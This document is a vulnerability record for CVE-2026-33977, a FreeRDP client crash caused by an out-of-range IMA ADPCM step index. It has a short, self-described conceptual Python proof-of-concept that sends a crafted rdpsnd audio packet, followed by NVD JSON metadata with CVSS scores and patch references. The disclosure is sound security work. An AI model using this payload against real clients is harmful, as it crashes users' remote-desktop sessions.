CVE-2026-33977

#!/usr/bin/env python3 # PoC for CVE-2026-33977: FreeRDP Client Crash via Malicious Audio Data # This script demonstrates how a malicious RDP server could trigger the crash. # Conceptual implementation using a library like impacket. import sys def send_malicious_audio_packet(rdp_connection): """ Simulates sending a malicious IMA ADPCM audio packet to the FreeRDP client. """ # 1. Negotiate Audio Output (RDPSND) and IMA ADPCM format # (Assuming negotiation has happened earlier in the connection) # 2. Construct the malicious payload # The vulnerability is triggered by the 'initial step index' in the audio data. # Valid range for the index table is 0-88. # Setting it to 89 or higher triggers the assert. malicious_step_index = 89 # Invalid value # Placeholder for the rest of the audio data audio_data_padding = b'\x00' * 100 # Construct the raw packet (Simplified structure) # Format: [Step Index (1 byte)] [Audio Data] payload = bytes([malicious_step_index]) + audio_data_padding print(f"[*] Sending malicious audio packet with step index: {malicious_step_index}") # 3. Send to the connected client try: rdp_connection.send_channel_data("rdpsnd", payload) print("[+] Packet sent. Client should crash due to WINPR_ASSERT failure.") except Exception as e: print(f"[-] Error sending packet: {e}") if __name__ == "__main__": # This is a conceptual representation. # In a real scenario, you would use a modified RDP server library. print("CVE-2026-33977 PoC: FreeRDP IMA ADPCM Index Crash") print("Requires a setup where a client connects to this server.")

{"cve": {"id": "CVE-2026-33977", "sourceIdentifier": "[email protected]", "published": "2026-03-30T22:16:19.117", "lastModified": "2026-04-01T20:05:49.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.24.2, a malicious RDP server can crash the FreeRDP client by sending audio data in IMA ADPCM format with an invalid initial step index value (>= 89). The unvalidated step index is read directly from the network and used to index into a 89-entry lookup table, triggering a WINPR_ASSERT() failure and process abort via SIGABRT. This affects any FreeRDP client that has audio redirection (RDPSND) enabled, which is the default configuration. This issue has been patched in version 3.24.2."}, {"lang": "es", "value": "FreeRDP es una implementación gratuita del Protocolo de Escritorio Remoto. Antes de la versión 3.24.2, un servidor RDP malicioso puede provocar el fallo del cliente FreeRDP al enviar datos de audio en formato IMA ADPCM con un valor de índice de paso inicial no válido (>= 89). El índice de paso no validado se lee directamente de la red y se utiliza para indexar una tabla de búsqueda de 89 entradas, lo que desencadena un fallo de WINPR_ASSERT() y la interrupción del proceso a través de SIGABRT. Esto afecta a cualquier cliente FreeRDP que tenga la redirección de audio (RDPSND) habilitada, que es la configuración predeterminada. Este problema ha sido parcheado en la versión 3.24.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:freerdp:freerdp:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.24.2", "matchCriteriaId": "03FF152C-C651-4586-8958-1555D9797516"}]}]}], "references": [{"url": "https://github.com/FreeRDP/FreeRDP/commit/9be3f03d94a50892fd58a9f7dee72b2313c69b47", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-8f2g-3q27-6xm5", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-8f2g-3q27-6xm5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}]}}